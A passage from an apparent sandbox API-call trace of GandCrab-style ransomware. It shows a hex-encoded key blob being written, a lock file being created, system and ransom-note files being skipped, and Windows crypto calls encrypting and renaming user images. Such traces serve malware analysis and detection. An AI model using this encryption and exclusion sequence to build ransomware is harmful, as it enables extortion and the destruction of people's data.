35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0093.810] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0093.811] CloseHandle (hObject=0x2ac) returned 1 [0093.811] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.811] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.811] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0x82)) [0093.811] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.811] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0093.811] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0093.812] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\d2ca4a09d2ca4deb61a.lock") returned 75 [0093.812] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\7vyfk2yzgvfdhogguhe\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0093.813] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.813] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.813] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\") returned 51 [0093.813] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\*" [0093.813] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x503738 [0093.813] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.813] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.814] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.814] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.814] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.814] lstrcmpW (lpString1="9r4DL.png", lpString2=".") returned 1 [0093.814] lstrcmpW (lpString1="9r4DL.png", lpString2="..") returned 1 [0093.814] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\", lpString2="9r4DL.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\9r4DL.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\9r4DL.png" [0093.814] lstrlenW (lpString=".titwmvjl") returned 9 [0093.814] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\9r4DL.png") returned 60 [0093.814] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.815] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\9r4DL.png.titwmvjl") returned 69 [0093.815] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\9r4DL.png") returned 60 [0093.815] lstrlenW (lpString=".png") returned 4 [0093.815] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.815] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".png ") returned 5 [0093.815] lstrcmpiW (lpString1=".png", lpString2=".titwmvjl") returned -1 [0093.815] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.815] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\9r4DL.png") returned 60 [0093.815] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\9r4DL.png") returned 60 [0093.815] lstrcmpiW (lpString1="9r4DL.png", lpString2="desktop.ini") returned -1 [0093.815] lstrcmpiW (lpString1="9r4DL.png", lpString2="autorun.inf") returned -1 [0093.815] lstrcmpiW (lpString1="9r4DL.png", lpString2="ntuser.dat") returned -1 [0093.815] lstrcmpiW (lpString1="9r4DL.png", lpString2="iconcache.db") returned -1 [0093.815] lstrcmpiW (lpString1="9r4DL.png", lpString2="bootsect.bak") returned -1 [0093.815] lstrcmpiW (lpString1="9r4DL.png", lpString2="boot.ini") returned -1 [0093.815] lstrcmpiW (lpString1="9r4DL.png", lpString2="ntuser.dat.log") returned -1 [0093.815] lstrcmpiW (lpString1="9r4DL.png", lpString2="thumbs.db") returned -1 [0093.815] lstrcmpiW (lpString1="9r4DL.png", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0093.816] lstrcmpiW (lpString1="9r4DL.png", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0093.816] lstrcmpiW (lpString1="9r4DL.png", lpString2="KRAB-DECRYPT.html") returned -1 [0093.816] lstrcmpiW (lpString1="9r4DL.png", lpString2="CRAB-DECRYPT.html") returned -1 [0093.816] lstrcmpiW (lpString1="9r4DL.png", lpString2="KRAB-DECRYPT.txt") returned -1 [0093.816] lstrcmpiW (lpString1="9r4DL.png", lpString2="CRAB-DECRYPT.txt") returned -1 [0093.816] lstrcmpiW (lpString1="9r4DL.png", lpString2="ntldr") returned -1 [0093.816] lstrcmpiW (lpString1="9r4DL.png", lpString2="NTDETECT.COM") returned -1 [0093.816] lstrcmpiW (lpString1="9r4DL.png", lpString2="Bootfont.bin") returned -1 [0093.816] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\9r4DL.png") returned 60 [0093.816] lstrlenW (lpString=".png") returned 4 [0093.816] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.816] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".png ") returned 5 [0093.816] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.816] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.816] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\9r4DL.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\7vyfk2yzgvfdhogguhe\\9r4dl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0093.817] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.817] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0093.818] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.818] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.818] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.818] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.819] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.819] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.819] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0093.819] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.819] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.819] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.819] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.819] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0093.820] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.820] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.820] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.820] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0093.820] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.820] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.820] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.821] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.821] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.821] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.821] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503938) returned 1 [0093.821] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.821] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.822] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.822] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.822] GetLastError () returned 0x0 [0093.822] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.822] CryptDestroyKey (hKey=0x503938) returned 1 [0093.822] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.822] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.822] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.823] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0093.823] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.823] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5034f8) returned 1 [0093.823] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.823] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0093.823] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.824] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0093.824] GetLastError () returned 0x0 [0093.824] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.824] CryptDestroyKey (hKey=0x5034f8) returned 1 [0093.825] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.825] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.825] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.825] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.825] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x301c, lpOverlapped=0x0) returned 1 [0093.836] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffcfe4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.836] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x301c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x301c, lpOverlapped=0x0) returned 1 [0093.838] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.838] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.839] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.843] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.843] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.843] CloseHandle (hObject=0x2b4) returned 1 [0093.845] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\9r4DL.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\7vyfk2yzgvfdhogguhe\\9r4dl.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\9r4DL.png.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\7vyfk2yzgvfdhogguhe\\9r4dl.png.titwmvjl"), dwFlags=0x1) returned 1 [0093.846] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.846] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.846] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0093.846] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0093.846] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\d2ca4a09d2ca4deb61a.lock" [0093.846] lstrlenW (lpString=".titwmvjl") returned 9 [0093.846] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\d2ca4a09d2ca4deb61a.lock") returned 75 [0093.847] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.847] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 84 [0093.847] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\d2ca4a09d2ca4deb61a.lock") returned 75 [0093.847] lstrlenW (lpString=".lock") returned 5 [0093.847] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0093.847] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0093.847] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.847] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.847] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0093.847] lstrcmpW (lpString1="emJ3ZNvJOxwkrKOed0kc.bmp", lpString2=".") returned 1 